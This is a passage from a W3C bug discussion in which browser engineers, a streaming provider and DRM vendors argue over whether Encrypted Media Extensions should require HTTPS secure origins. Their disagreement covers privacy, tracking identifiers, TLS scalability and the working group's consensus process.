It's not at all an absurd statement. Multiple browser vendors are exploring just that: ways to restrict cookies to only secure origins, for precisely the same reasons as those being discussed here. Chromium, for example, has bugs https://code.google.com/p/chromium/issues/detail?id=149962 and https://code.google.com/p/chromium/issues/detail?id=399416 to track these efforts.

While it's quite obvious that EME provides worse privacy than cookies - as it offers a way to cryptographically bind a persistent identifier, unlike the existing cookie mechanisms, which provide no such assurance (cookies can easily be copied) - the fact that cookies exist is by no means an acceptable justification for further eroding privacy.

Regardless, it's clear from this bug that the opponents of a secure origin requirement are not making concrete suggestions for dealing with these privacy concerns. The only options that have been put forth so far are doing nothing in the spec - which is ignoring the problem entirely - or to place a requirement in the spec for secure origins, and then work towards a consensus that can alleviate these concerns. Since it's clear that "doing nothing" is not an acceptable solution for anyone, from the TAG, to UAs, to users, the onus needs to be on those who object to secure origins to make concrete and actionable proposals to reduce that risk. But if no proposals can be made, secure origins are logically the least that a UA can do to address the concerns.
Comment 109 Mark Watson 2014-10-27 02:55:28 UTC
(In reply to Ryan Sleevi from comment #108)
> (In reply to Glenn Adams from comment #105)
> > (In reply to David Dorwin from comment #104)
> 
> Regardless, it's clear from this bug that the opponents of a secure
> origin requirement are not making concrete suggestions for dealing with
> these privacy concerns. The only options that have been put forth so far are
> doing nothing in the spec - which is ignoring the problem entirely - or to
> place a requirement in the spec for secure origins, and then work towards a
> consensus that can alleviate these concerns. Since it's clear that "doing
> nothing" is not an acceptable solution for anyone, from the TAG, to UAs, to
> users, the onus needs to be on those who object to secure origins to make
> concrete and actionable proposals to reduce that risk. But if no proposals can be
> made, secure origins are logically the least that a UA can do to address the
> concerns.

There are mitigations to all the concerns described in the document (and if not there, in this and other threads, I believe). We can and should discuss the normative strength of those, as I have repeatedly said. We are at the very beginning of this whole discussion, not the end.

But in the end, the onus is on browser vendors to provide a viable solution because if the solution you provide is not viable - financially, say - sites will not use it. HTTPS is not there yet, as I've explained. We need alternatives - which for this problem clearly exist - and / or a reasonable industry plan to make HTTPS sufficiently reliable and efficient at scale. Sticking your head in the sand and expecting standards fiat to achieve that is not productive.
Comment 110 Ryan Sleevi 2014-10-27 03:23:59 UTC
(In reply to Mark Watson from comment #109)
> There are mitigations to all the concerns described in the document (and if
> not there, in this and other threads, I believe). We can and should discuss
> the normative strength of those, as I have repeatedly said. We are at the
> very beginning of this whole discussion, not the end.

I don't think anyone is suggesting we're near the end. However, as we continue to make progress, it's important that we set a reasonable set of expectations. It's clear - from this bug and from the related threads going on - that these concerns are not at all sufficiently normatively addressed. The secure origin proposal sets forth a baseline to make sure that, as we progress on both this issue and related, we have a reasonable path for security. Ignoring these concerns in the spec, by objecting to any sort of requirement, especially as implementations progress, is to do a disservice to the privacy of users and the interoperability concerns of UAs.
 
> But in the end, the onus is on browser vendors to provide a viable solution
> because if the solution you provide is not viable - financially, say - sites
> will not use it. HTTPS is not there yet, as I've explained. We need
> alternatives - which for this problem clearly exist - and / or a reasonable
> industry plan to make HTTPS sufficiently reliable and efficient at scale.
> Sticking your head in the sand and expecting standards fiat to achieve that
> is not productive.

I think it's a gross mischaracterization to say that HTTPS is not sufficiently reliable and efficient at scale. As discussed in this bug and related threads, it's clear that the industry disagrees (e.g. the provisioning of free TLS by CloudFlare and others for their customers, or the ability of YouTube to serve video via HTTPS).

What's clear - and certainly understandable - is that some site operators have made a set of decisions that makes HTTPS less than desirable for them. That's unfortunate, but also understandable in a market where content, rather than security or scalability, is the differentiator. But that's not an intrinsic or necessary property of TLS, as clearly demonstrated by the counter-points, nor does it require "a reasonable industry plan" to make it reliable or scalable, when it's clearly and demonstrably already that.

Further, I certainly object to the characterization that UAs have an onus to "make sites use it". There are plenty of technologies that site operators have had to invest in changes to reasonably support, whether they be new protocols like SPDY or HTTP/2, security features such as Content Security Policy and HSTS, or the ongoing changes in security threats, such as deprecating SSL3.0 or SHA-1. The onus of the UA is not to get sites to adopt the latest and greatest features - it's to ensure that users' privacy and security expectations are preserved, both from 'new' threats and from new web platform features.

The prevalence of persistent and active attacks over HTTP by both ISPs (http://arstechnica.com/security/2014/10/verizon-wireless-injects-identifiers-link-its-users-to-web-requests/ , http://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/ ) and by governments ( https://firstlook.org/theintercept/2014/08/15/cat-video-hack/ , http://blog.jgc.org/2011/01/code-injected-to-steal-passwords-in.html ) makes it clear to UAs that introducing new tracking mechanisms over HTTP, particularly one that has a strong cryptographic binding, represents a real risk to user privacy. In such a world, the risk posed by EME over HTTP is far greater than the risk of a site opting to not use EME at all, and any perceived value of EME is eliminated entirely due to the privacy damage caused by allowing it over HTTP. While there may be large sites who, in the face of an EME+TLS requirement, will opt not to use EME at all, I think they'll find that legacy methods - such as plugins - will also be required to use TLS or extensive user consent in the future. In the priority of constituencies, user security must and will ALWAYS trump site operators' unfounded concerns.

I also think it's a mischaracterization to suggest that UAs are slaves to the spec, or that the spec somehow trumps the security concerns. The spec exists to provide interoperability between vendors, which is important, but I think you will find that when faced with a choice of interoperability versus security/privacy, UAs will consistently choose security/privacy. We see this time ( http://www.theverge.com/2013/2/23/4023078/firefox-to-start-blocking-cookies-from-third-party-advertisers ) and time again ( http://www.chromium.org/developers/npapi-deprecation ). So if the spec fails to address the security concerns - such as by failing to set the necessary normative requirements to ensure reasonable security/privacy - then I think we'll just see UAs going above and beyond what the spec requires in order to meet those concerns, rightfully placing the privacy of users over the desire of some sites to use some new feature. That's the entire point of this bug - if the spec fails to address these concerns, then we'll just see UAs doing it in ways that are potentially non-interoperable, because UAs MUST protect their users.
Comment 111 Mark Watson 2014-10-27 05:52:04 UTC
(In reply to Ryan Sleevi from comment #110)
> (In reply to Mark Watson from comment #109)
>  
> > But in the end, the onus is on browser vendors to provide a viable solution
> > because if the solution you provide is not viable - financially, say - sites
> > will not use it. HTTPS is not there yet, as I've explained. We need
> > alternatives - which for this problem clearly exist - and / or a reasonable
> > industry plan to make HTTPS sufficiently reliable and efficient at scale.
> > Sticking your head in the sand and expecting standards fiat to achieve that
> > is not productive.
> 
> I think it's a gross mischaracterization to say that HTTPS is not
> sufficiently reliable and efficient at scale. 

Well, this is just what our real-world at-scale data suggests. You can choose to change your opinion in the face of factual data, or not. Up to you. Either way, these are problems which can be solved, but not ignored.

For example, some browsers have made massive strides in recent years on TLS reliability (specifically, the frequency with which TLS connection setup fails). But this is not universal ... yet.

It would be great if you could publish server capacity figures from YouTube for HTTP vs HTTPS - I sent you the names of our contacts there who had that information.

> 
> Further, I certainly object to the characterization that UAs have an onus to
> "make sites use it".

I don't believe I said that. I said the onus on UAs is to 'provide viable solutions'. The only alternative to viable solutions in UAs is plugins and failing that, native apps.

> 
> The prevalence of persistent and active attacks over HTTP by both ISPs
> (http://arstechnica.com/security/2014/10/verizon-wireless-injects-
> identifiers-link-its-users-to-web-requests/ ,
> http://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/ ) and
> by governments (
> https://firstlook.org/theintercept/2014/08/15/cat-video-hack/ ,
> http://blog.jgc.org/2011/01/code-injected-to-steal-passwords-in.html ) makes
> it clear to UAs that introducing new tracking mechanisms over HTTP,
> particularly one that has a strong cryptographic binding, represents a real
> risk to user privacy.

Again, as far as I understand it, there is no reason from our side that CDMs integrated with desktop UAs should introduce tracking concerns that are worse than cookies - at least for the basic level of robustness expected for desktop browsers. I don't believe there is a requirement for 'strong cryptographic binding'. With your permission, I could provide more information as to what I know about your solution in this respect.

> In such a world, the risk posed by EME over HTTP is
> far greater than the risk of a site opting to not use EME at all, and any
> perceived value of EME is eliminated entirely due to the privacy damage
> caused by allowing it over HTTP.

Well, this is your call if you really think EME over HTTP is worse than plugins over HTTP.

You could also remove support for plugins without making EME available as an alternative.

You're of course free to cut off support for parts of the web in your browser, if you consider those parts too dangerous for your users. You could have disabled Silverlight last year or the year before, but you didn't. What changed? The security / privacy properties of Silverlight? No, the availability of a viable alternative made it possible. This was a good thing, no?

> While there may be large sites who, in the
> face of an EME+TLS requirement, will opt not to use EME at all, I think
> they'll find that legacy methods - such as plugins - will also be required
> to use TLS or extensive user consent in the future. In the priority of
> constituencies, user security must and will ALWAYS trump site operators
> unfounded concerns.

The repeated suggestion that we do not care about user privacy or security is, frankly, quite tiresome. This whole effort, over the last four years on my part, has been about migrating from the wild west of plugins to a model where this functionality is provided by User Agent implementors and so, amongst other important things, privacy and security are in the User Agent implementors' hands. And in practice this has already been achieved for desktop IE, Safari, Chrome and in due course I expect for Firefox, all over HTTP and with the User Agent implementors fully aware of the privacy properties. It's hugely disappointing to see this jeopardised just as it's coming to fruition. 

> 
> I also think it's a mischaracterization to suggest that UAs are slaves to
> the spec, or that the spec somehow trumps the security concerns. The spec
> exists to provide interoperability between vendors, which is important, but
> I think you will find that when faced with a choice of interoperability
> versus security/privacy, UAs will consistently choose security/privacy. We
> see this time (
> http://www.theverge.com/2013/2/23/4023078/firefox-to-start-blocking-cookies-
> from-third-party-advertisers ) and time again (
> http://www.chromium.org/developers/npapi-deprecation ). So if the spec fails
> to address the security concerns - such as by failing to set the necessary
> normative requirements to ensure reasonable security/privacy - then I think
> we'll just see UAs going above and beyond what the spec requires in order to
> meet those concerns, rightfully placing the privacy of users over the desire
> of some sites to use some new feature. That's the entire point of this bug -
> if the spec fails to address these concerns, then we'll just see UAs doing
> it in ways that are potentially non-interoperable, because UAs MUST protect
> their users.

Sure, and this is why we have a consensus process, which guarantees that the spec cannot ship if you really oppose it (the definition of consensus, by the way, is the lack of sustained opposition, so you need not be afraid: if you have a valid point, your voice will be heard). I'm all in with that model. To me it means that we commit to adapting our service to be based on the spec, whatever it eventually says. Or, put another way, I won't agree to a spec we wouldn't be able to adapt to; I'll keep working with the rest of the group until we get to a solution which satisfies all the concerns - and you all know that, so you know it's worth investing in the process.

I expect others to approach this the same way. Recent events make me wonder if you, Google, are signed up to the same thing as me?

An open standardization process is not only about documenting interoperable behavior - a private group of UA implementors could do that on their own with much less overhead. It's about committing to take seriously the concerns of multiple stakeholders, to keep on working until there is consensus, and in deference to the value that brings a willingness to accept consensus-based outcomes.
Comment 112 Ryan Sleevi 2014-10-27 06:48:42 UTC
(In reply to Mark Watson from comment #111)
> For example, some browsers have made massive strides in recent years on TLS
> reliability (specifically, the frequency with which TLS connection setup
> fails). But this is not universal ... yet.

I don't want to pivot this bug into a discussion of TLS reliability, but I do want to at least dispel the meme that TLS reliability is somehow a browser issue. It's not, nor is the behaviour of 'legacy' browsers relevant to discussions of EME (as these browsers won't, by definition, support EME), nor is there some 'massive strides on TLS reliability' effort going on by browsers - it's servers recognizing that configuring TLS is a manageable, tractable problem that can easily be addressed by engineering.

> It would be great if you could publish server capacity figures from YouTube
> for HTTP vs HTTPS - I sent you the names of our contacts there who had that
> information.

That's not really relevant or germane, given that this information has been provided in the past. The experience that TLS scales is not unique to Google - see http://blog.cloudflare.com/universal-ssl-how-it-scales/ for CloudFlare, http://lists.w3.org/Archives/Public/ietf-http-wg/2012JulSep/0251.html for Facebook, or https://blog.twitter.com/2013/forward-secrecy-at-twitter for Twitter - not to mention Google's own experiences at https://www.imperialviolet.org/2010/06/25/overclocking-ssl.html

The point is that yes, it's possible to engineer scalable TLS. It's also possible to engineer inefficient TLS. It's not an intrinsic property that TLS doesn't scale - quite the opposite, it's just like any other engineering problem, and one which has known solutions.

This is why I continue to object to the suggestion that this requires "industry efforts" to make TLS scale. TLS does scale; the information is readily available and deployed; the only issue is that it has to be acted on.


> > Further, I certainly object to the characterization that UAs have an onus to
> > "make sites use it".
> 
> I don't believe I said that. I said the onus on UAs is to 'provide viable
> solutions'. The only alternative to viable solutions in UAs is plugins and
> failing that, native apps.

It's quite clear what you said. UAs have an onus to provide viable solutions in order that sites will use them. If UAs don't provide viable solutions, sites won't use them. However, both statements presume that the goal is that sites use EME. No, the goal of UAs is to preserve a minimum of user privacy and, where such privacy is insufficient (as with HTTP cookies), to continue to work to improve the status quo in existing specs and to ensure they don't repeat the same mistakes in new specs.

> Again, as far as I understand it, there is no reason from our side that CDMs
> integrated with desktop UAs should introduce tracking concerns that are
> worse than cookies - at least for the basic level of robustness expected for
> desktop browsers.

That's clearly not true from at least two vendors' solutions, nor is it required in the spec, nor does the spec currently make a distinction as to the robustness requirements for different platforms or form factors (e.g. desktop vs mobile). It's also clear that content providers do not share that view - as you know, several content providers require that the device ID "not" be trivially copiable between machines for that CDM solution to be acceptable.

Rather, the spec steers well clear of such robustness requirements, precisely because these differ on a content provider by content provider basis and, for many content providers, vary studio by studio, and in ways that cannot be shared or discussed publicly (as has been suggested in the past).

Since you're now introducing a gradient to the discussion - that different platforms (or, as is more likely, different _content_, such as SD vs HD) have different robustness requirements - are you suggesting that the spec should normatively introduce these differences, as well as normatively require how the different requirements are met? For example, for "Desktop", a CDM MUST NOT introduce any more privacy bits than those afforded by the User-Agent String (e.g. for users on the same OS and UA, any identifiers will be identical among all users with that OS+UA), whereas for "High Def" content, if a CDM attests to a unique device identifier (per-origin or otherwise), it MUST be served over a secure transport. Is that a solution that you consider viable?

> Well, this is your call if you really think EME over HTTP is worse than
> plugins over HTTP.

Or, as you like to state, it's as bad as plugins over HTTP. And plugins are horrible for user security and privacy, as has been repeatedly shown over the past decade, which is why UAs are working on communicating that risk - and the concerns - to users.

> You're of course free to cut off support for parts of the web in your
> browser, if you consider those parts too dangerous for your users. You could
> have disabled Silverlight last year or the year before, but you didn't. What
> changed? The security / privacy properties of Silverlight? No, the
> availability of a viable alternative made it possible. This was a good
> thing, no?

And isn't that the goal of this discussion - to make sure that EME actually meets the bare minimum security and privacy requirements of 2014, rather than barely struggling to meet those of 1999? I'm not sure how to take your reasoning here, other than "You can't turn off plugins unless you give us something as privacy-hostile as plugins", which is of course false. If the alternative is as bad as the problem, then clearly some new solution will be found by UAs.

> The repeated suggestion that we do not care about user privacy or security
> is, frankly, quite tiresome. This whole effort, over the last four years on
> my part, has been about migrating from the wild west of plugins to a model
> where this functionality is provided by User Agent implementors and so,
> amongst other important things, privacy and security are in the User Agent
> implementors' hands. And in practice this has already been achieved for
> desktop IE, Safari, Chrome and in due course I expect for Firefox, all over
> HTTP and with the User Agent implementors fully aware of the privacy
> properties. It's hugely disappointing to see this jeopardised just as it's
> coming to fruition. 

It's clear that you don't care to the same degree we do, or value it to the same degree we do, otherwise this discussion would be moot. Nor is anything being jeopardized - EME continues to progress, and the deficiencies in the spec with regards to privacy and security are slowly being addressed, although in ways that some are not happy with.

> An open standardization process is not only about documenting interoperable
> behavior - a private group of UA implementors could do that on their own
> with much less overhead. It's about committing to take seriously the
> concerns of multiple stakeholders, to keep on working until there is
> consensus, and in deference to the value that brings a willingness to accept
> consensus-based outcomes.

I suspect you're far more optimistic about the W3C process than its history warrants. A spec that fails to take into account the concerns of UAs, regardless of how much consensus it has among non-UAs, is a spec that isn't implemented. This has been the case time and time again in a variety of SDOs, but can be trivially seen with both XHTML and HTML5.

I definitely balk at the suggestion that UAs can't or shouldn't protect user privacy simply because doing so is expensive for certain entrenched players. UAs can, must, and will treat privacy concerns as paramount (as they should). I think we can and should continue to explore solutions for addressing the concerns being discussed, and hopefully the W3C will provide a venue for site operators such as yourself and UA vendors such as us to express the concerns and understand the solutions.

But let's not mistakenly presume that the spec has primacy. Again, and as you've seen from multiple vendors (Mozilla, Apple, and Microsoft all included), if a spec fails to meaningfully address the security concerns, UAs will take appropriate steps. Sometimes that means not implementing a spec at all, sometimes it means disabling certain features (as was seen with third-party cookies), and sometimes it means imposing requirements above and beyond what the spec requires, when the spec itself fails to take user security into consideration.

Since we know there is interest in UAs to implement, and we know there's interest in sites to use, let's try to find workable, normative requirements for EME that can meaningfully address the risks that have been identified. If this means normatively specifying robustness requirements, let's have that discussion. But if workable solutions aren't being put forth - and from this bug, they really aren't - then we're going to be "stuck" with at least a bare minimum of requiring a secure top-level document origin.
Comment 113 Jerry Smith 2014-10-27 17:40:46 UTC
It's difficult for me to see how a cryptographically secured identifier imposes a higher risk of identity tracking compared to cookies in general.  If anything, the steps required to retrieve the CDM identifier make it more difficult to abuse and less likely to be exploited.  Browsers can further implement features to reset this identifier, and can allow users to disable the identifier in general, though with loss of EME functionality.

I agree with comments in this bug about reverting this change.  The conversation hadn't been concluded, and the consensus in the working group (if there was one) seemed to be opposition.  I don't believe it is our process to implement a controversial change and then debate whether it should be retained or not, especially following open discussion that did not support it.
Comment 114 Ryan Sleevi 2014-10-27 18:09:50 UTC
(In reply to Jerry Smith from comment #113)
> It's difficult for me to see how a cryptographically secured identifier
> imposes a higher risk of identity tracking compared to cookies in general. 

1) As you no doubt are quite familiar with, the introduction of cryptography into an ecosystem creates a new set of legal expectations and rights for users with respect to privacy preserving decisions. For example, in the US, there's the DMCA that restricts what actions a user can take, restrictions which do not intrinsically apply to cookies the same way.

2) Even if the minimum were "equivalent to cookies" (a meme that is factually and demonstrably false, especially with respect to the normative requirements of the spec), cookies themselves, as has been discussed, are NOT an acceptable level of security/privacy in 2014. This can be trivially seen ( http://www.washingtonpost.com/blogs/the-switch/wp/2013/12/10/nsa-uses-google-cookies-to-pinpoint-targets-for-hacking/ )

> If anything, the steps required to retrieve the CDM identifier make it more
> difficult to abuse and less likely to be exploited. 

Are you suggesting that these steps are normatively required?

If not, then it fails to address the fundamental issue with the spec, relying instead on the good will, good behaviour, and intentions of media companies, ISPs, and user agents - an idealistic vision that has no basis in reality, as demonstrated by abundant evidence in this bug and related threads.

> Browsers can further
> implement features to reset this identifier, and can allow users to disable
> the identifier in general, though with loss of EME functionality.

Surely you don't mean to argue that it meets the priority of constituencies for privacy and functionality to be mutually exclusive for users, simply because meaningful user privacy is seen as financially troublesome for some site operators?

That is, we have a clear proposal that can trivially meet many (but understandably, not all) privacy goals for users, in a way that doesn't require them to be functionally limited as an intrinsic property.

> I agree with comments in this bug about reverting this change.  The
> conversation hadn't been concluded, and the consensus in the working group
> (if there was one) seemed to be opposition.  I don't believe it is our
> process to implement a controversial change and then debate whether it
> should be retained or not, especially following open discussion that did not
> support it.

There is clearly a shared sentiment - from the W3C TAG, from extensive community contributions, and from UAs - that there exist real and meaningful privacy concerns. Comment #48 and Comment #70 collect just a small fraction of these concerns. So yes, these are concerns that MUST be addressed if this spec is to progress.

Currently, we have at least one concrete proposal to address them - normatively requiring TLS. We can continue the discussion and look at other normative requirements to address both the set of privacy concerns yet unaddressed and the introduction of normative requirements on CDMs that might alternatively address the concerns regarding CDMs and privacy.

However, there's clear consensus that "doing nothing" is not acceptable, so doing nothing only serves to show the broader community either that a) the WG is not taking privacy seriously or b) that members are hoping to delay such requirements past the point of implementation, such that it becomes unviable in the market for any UA to prioritize user privacy. No one is suggesting the current text is final - but the current text does more to meaningfully address the concerns than nothing, so it is surely a step in the right direction.
Comment 115 Glenn Adams 2014-10-27 19:46:16 UTC
(In reply to Ryan Sleevi from comment #114)
> There is clearly a shared sentiment - from the W3C TAG, from extensive
> community contributions, and from UAs - that there exist real and
> meaningful privacy concerns. Comment #48 and Comment #70 collect just a
> small fraction of these concerns. So yes, these are concerns that MUST be
> addressed if this spec is to progress.

It is up to the WG to decide "what" must be addressed, and "how" a concern is addressed. It is not a requirement that every concern be resolved; the WG may conclude that an acceptable resolution is WONTFIX or LATER.

Simply because it is a sentiment of the TAG does not require that the WG concur.

> However, there's clear consensus that "doing nothing" is not acceptable...

Since there has been no CfC to the TF or WG on this point, it is premature to suggest what is or is not acceptable.
Comment 116 Joe Steele 2014-10-28 02:54:12 UTC
I don't believe it is useful to continue the conversation until this change is reverted. It would be worth spending my time to come up with a better solution only if there were some guarantee that that solution would at least be considered. By forcing controversial changes in without consensus, my confidence that any proposals I might make will be considered has been sorely shaken.
Comment 117 David Dorwin 2014-10-29 01:01:11 UTC
(In reply to Ryan Sleevi from comment #112)
> (In reply to Mark Watson from comment #111)

> > The repeated suggestion that we do not care about user privacy or security
> > is, frankly, quite tiresome. This whole effort, over the last four years on
> > my part, has been about migrating from the wild west of plugins to a model
> > where this functionality is provided by User Agent implementors and so,

While some desktop implementations are better than plugins, that doesn’t mean the spec or implementations are at a level appropriate for the web platform. Other clients will be exposing functionality to the drive-by web that was previously only available to native installed apps. With only three implementations, all in desktop browsers, there are already questions about whether adequate privacy and security precautions have been taken. That demonstrates that there is reason to be concerned, especially as EME is implemented in more user agents on more platforms.

One DRM vendor has said “I don’t believe you can have DRM without an exchange of PII. That is the nature of DRM.” [1] There is clearly a record of privacy issues that need to be addressed before DRM is exposed to the web without plugins.

> > amongst other important things, privacy and security are in the User Agent
> > implementors' hands. And in practice this has already been achieved for
> > desktop IE, Safari, Chrome and in due course I expect for Firefox, all over

You argue that because these browsers have implemented EME over HTTP, this must be okay. Yet, it is clear that if any of those browsers had chosen to require a secure origin, they would not be supported via HTML5 by Netflix and others [2].

> > HTTP
> > and with the User Agent implementors fully aware of the privacy
> > properties.

Comment #113 calls this logic into question, or at least shows there are disagreements about the privacy properties. 

> > It's hugely disappointing to see this jeopardised just as it's
> > coming to fruition. 
> 
> It's clear that you don't care to the same degree we do, or value it to the
> same degree we do, otherwise this discussion would be moot. Nor is anything
> being jeopardized - EME continues to progress, and the deficiencies in the
> spec with regards to privacy and security are slowly being addressed,
> although in ways that some are not happy with.

Seconding this, it’s hard to argue that you care about these things when most of the effort so far has been to deny that the problems exist [3], discredit the TAG’s analysis [4], and restrict analysis to a small subset of implementations [5] rather than finding ways to solve them.

When people opposed the W3C working on EME, you touted improved security and privacy, including from W3C review [6] and said that “EME is about *constraining* DRM on the web and subjecting it to more public, open, privacy and security review” and referred to “W3C supervision” [7]. However, now that we have such review and it is incompatible with your desires, you and others reject it.

> > An open standardization process is not only about documenting interoperable
> > behavior - a private group of UA implementors could do that on their own
> > with much less overhead. It's about committing to take seriously the
> > concerns of multiple stakeholders, to keep on working until there is
> > consensus, and in deference to the value that brings a willingness to accept
> > consensus-based outcomes.

It’s also not about documenting behavior of existing implementations regardless of the security, privacy, and interoperability properties. UA-DRM vendor pairs could also do that on their own and tell content providers how to write applications for their solution. It is about committing to take seriously the security and privacy of users and to maintain the one web platform. That is why we are at the W3C, getting the kind of supervision you alluded to in [7].

[1] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0087.html
[2] “browsers who choose to support only HTTPS will find their customers either still using plugins, or cut off from services - a different kind of fragmentation of the web.” - http://lists.w3.org/Archives/Public/www-tag/2014Oct/0096.html
[3] e.g. http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
[4] e.g. Comment #103, Comment #107
[5] e.g. Comment #111
[6] http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Oct/0034.html
[7] http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Aug/0036.html
Comment 118 David Dorwin 2014-10-29 01:02:52 UTC
(In reply to Joe Steele from comment #116)
> I don't believe it is useful to continue the conversation until this change
> is reverted. It would be worth spending my time to come up with a better
> solution only if there were some guarantee that that solution would at least
> be considered. By forcing controversial changes in without consensus, my
> confidence that any proposals I might make will be considered has been
> sorely shaken.

I'm not sure why you feel your solution would not be considered. I have been asking for proposals for months (e.g. comment #63) and reiterated this when I made the change (comment #92). It's ironic that people are threatening not to contribute to improving the spec until this change is reverted - it was the lack of constructive contributions that left us with this as the only concrete proposal. I continue to be willing to consider proposals for normative solutions or ways to reduce the impact on content providers.

However, I am concerned that it is not worth any of our time working on a spec that will never progress because a small minority without alternative solutions can block important security, privacy, and interoperability improvements necessary for EME to become part of the web platform. At least one browser vendor and the TAG, which includes the Director who considers Formal Objections, have strong objections to the previous lack of this requirement, which may endanger the WG's ability to reach Recommendation. While reverting the text might appease those that oppose requiring a secure origin and threaten not to participate, it would show a lack of regard for users and does nothing to move us closer to consensus or a publishable spec. Contributing “specific ideas for addressing the security and/or privacy concerns OR the impact on content providers” that I solicited in comment #92 (and earlier) would do both.
Comment 119 David Dorwin 2014-10-29 01:03:57 UTC
For those of you at TPAC, https://www.w3.org/wiki/TPAC2014/SessionIdeas#Responses_to_Pervasive_Monitoring_and_Secure_Origins sounds relevant.
Comment 120 Joe Steele 2014-10-29 01:27:51 UTC
(In reply to David Dorwin from comment #117)
> (In reply to Ryan Sleevi from comment #112)
> > (In reply to Mark Watson from comment #111)
> One DRM vendor has said “I don’t believe you can have DRM without an
> exchange of PII. That is the nature of DRM.” [1] There is clearly a record
> of privacy issues that need to be addressed before DRM is exposed to the web
> without plugins.

Please give the full context:
"I don’t believe you can have DRM without an exchange of PII. That is the nature of DRM. What you can do is regulate how that PII is exchanged (this is somewhat within the scope of the spec) and how is it handled by the recipients (completely outside the scope of this spec). "

Digital Identity is the bit of PII [1] that most often comes into play here, and I think the one most relevant for EME. Since you seem to disagree with the quoted text, please give a counterexample: a DRM system for protecting content, relevant to EME, that does not require any PII.

[1] http://en.wikipedia.org/wiki/Personally_identifiable_information

(In reply to David Dorwin from comment #118)
> (In reply to Joe Steele from comment #116)
> > I don't believe it is useful to continue the conversation until this change
> > is reverted. It would be worth spending my time to come up with a better
> > solution only if there were some guarantee that that solution would at least
> > be considered. By forcing controversial changes in without consensus, my
> > confidence that any proposals I might make will be considered has been
> > sorely shaken.
> 
> I'm not sure why you feel your solution would not be considered. I have been
> asking for proposals for months (e.g. comment #63) and reiterated this when I
> made the change (comment #92). 

I _did_ feel like my proposals would be considered until this. 

If you had prefixed your request for proposals with -- "By the way, I am going to make whatever change I feel like if you don't respond within the next day or so" -- I believe you would have gotten a much faster response. 

I agree that this proposal is moving slowly. I think that is a good thing. We want to get it right.
Comment 121 Mark Watson 2014-10-29 02:18:50 UTC
(In reply to David Dorwin from comment #118)
> (In reply to Joe Steele from comment #116)
> > I don't believe it is useful to continue the conversation until this change
> > is reverted. It would be worth spending my time to come up with a better
> > solution only if there were some guarantee that that solution would at least
> > be considered. By forcing controversial changes in without consensus, my
> > confidence that any proposals I might make will be considered has been
> > sorely shaken.
> 
> I'm not sure why you feel your solution would not be considered. I have been
> asking for proposals for months (e.g. comment #63) and reiterated this when I
> made the change (comment #92). It's ironic that people are threatening not
> to contribute to improving the spec until this change is reverted - it was
> the lack of constructive contributions that left us with this as the only
> concrete proposal. I continue to be willing to consider proposals for
> normative solutions or ways to reduce the impact on content providers.
> 
> However, I am concerned that it is not worth any of our time working on a
> spec that will never progress because a small minority without alternative
> solutions can block important security, privacy, and interoperability
> improvements necessary for EME to become part of the web platform. At least
> one browser vendor and the TAG, which includes the Director who considers
> Formal Objections, have strong objections to the previous lack of this
> requirement, which may endanger the WG's ability to reach Recommendation.
> While reverting the text might appease those that oppose requiring a secure
> origin and threaten not to participate, it would show a lack of regard for
> users and does nothing to move us closer to consensus or a publishable spec.
> Contributing “specific ideas for addressing the security and/or privacy
> concerns OR the impact on content providers” that I solicited in comment #92
> (and earlier) would do both.

Reverting the specification has nothing to do with the technical issues, but is about demonstrating a commitment to a process which is ultimately consensus-based and about a basic willingness to work constructively with the other participants.

I don't know where you got the idea this was going slowly. It's a huge issue that was raised only very late in a multi-year process. It's also hugely controversial and controversial issues take time to resolve. A short time ago I committed to provide some data, which had to be gathered and discussed internally. I provided it on Friday, but you hadn't even waited for that.

I take exception to the suggestion that no alternatives have been proposed. I have repeatedly suggested that we work rigorously through the cases and understand the necessity and value of secure origins in each. I might not have proposed alternative text, but there are proposed avenues as yet unexplored.

I'm more than happy to engage on the technical issues once the change is reverted.
Comment 122 Mark Watson 2014-10-29 02:47:24 UTC
(In reply to David Dorwin from comment #117)
> (In reply to Ryan Sleevi from comment #112)
> > (In reply to Mark Watson from comment #111)
> 
> > > The repeated suggestion that we do not care about user privacy or security
> > > is, frankly, quite tiresome. This whole effort, over the last four years on
> > > my part, has been about migrating from the wild west of plugins to a model
> > > where this functionality is provided by User Agent implementors and so,
> 
> While some desktop implementations are better than plugins, that doesn’t
> mean the spec or implementations are at a level appropriate for the web
> platform. Other clients will be exposing functionality to the drive-by web
> that was previously only available to native installed apps. With only three
> implementations, all in desktop browsers, there are already questions about
> whether adequate privacy and security precautions have been taken. That
> demonstrates that there is reason to be concerned, especially as EME is
> implemented in more user agents on more platforms.

I don't disagree with any of the above. However, if you don't trust user agents to take sufficient precautions for user security and privacy, you have bigger problems, surely.

> 
> > > amongst other important things, privacy and security are in the User Agent
> > > implementors' hands. And in practice this has already been achieved for
> > > desktop IE, Safari, Chrome and in due course I expect for Firefox, all over
> 
> You argue that because these browsers have implemented EME over HTTP, this
> must be okay. Yet, it is clear that if any of those browsers had chosen
> to require a secure origin, they would not be supported via HTML5 by Netflix
> and others [2].

This has been a 3-year project during which we've made significant changes to our service to accommodate HTTP-specific privacy concerns raised by browsers. I think if the secure origin requirement had been known from the beginning, we would be in a different place.

But, yes, browsers are free to disable services they feel are unsafe, whether that is by disabling plugins, which could have been done at any time, or by disabling any other functionality on which in-the-field services depend.

> 
> > > HTTP
> > > and with the User Agent implementors fully aware of the privacy
> > > properties.
> 
> Comment #113 calls this logic into question, or at least shows there are
> disagreements about the privacy properties.

Whilst I don't agree with your characterization of Jerry's comment, I agree there are disagreements. That's why we need to continue the discussion so that at least we are all on the same page with the facts. Indeed digging more rigorously into the specific cases and properties is exactly what I have been suggesting.

> 
> > > It's hugely disappointing to see this jeopardised just as it's
> > > coming to fruition. 
> > 
> > It's clear that you don't care to the same degree we do, or value it to the
> > same degree we do, otherwise this discussion would be moot. Nor is anything
> > being jeopardized - EME continues to progress, and the deficiencies in the
> > spec with regards to privacy and security are slowly being addressed,
> > although in ways that some are not happy with.
> 
> Seconding this, it’s hard to argue that you care about these things when
> most of the effort so far has been to deny that the problems exist [3],

No, I said that the system could be designed so that the privacy properties were not worse than cookies. I think that's correct. It suggests that HTTPS is not required _in all cases_, not that there is no problem.

> discredit the TAG’s analysis [4],

Comment #107 was entirely factual.

> and restrict analysis to a small subset of
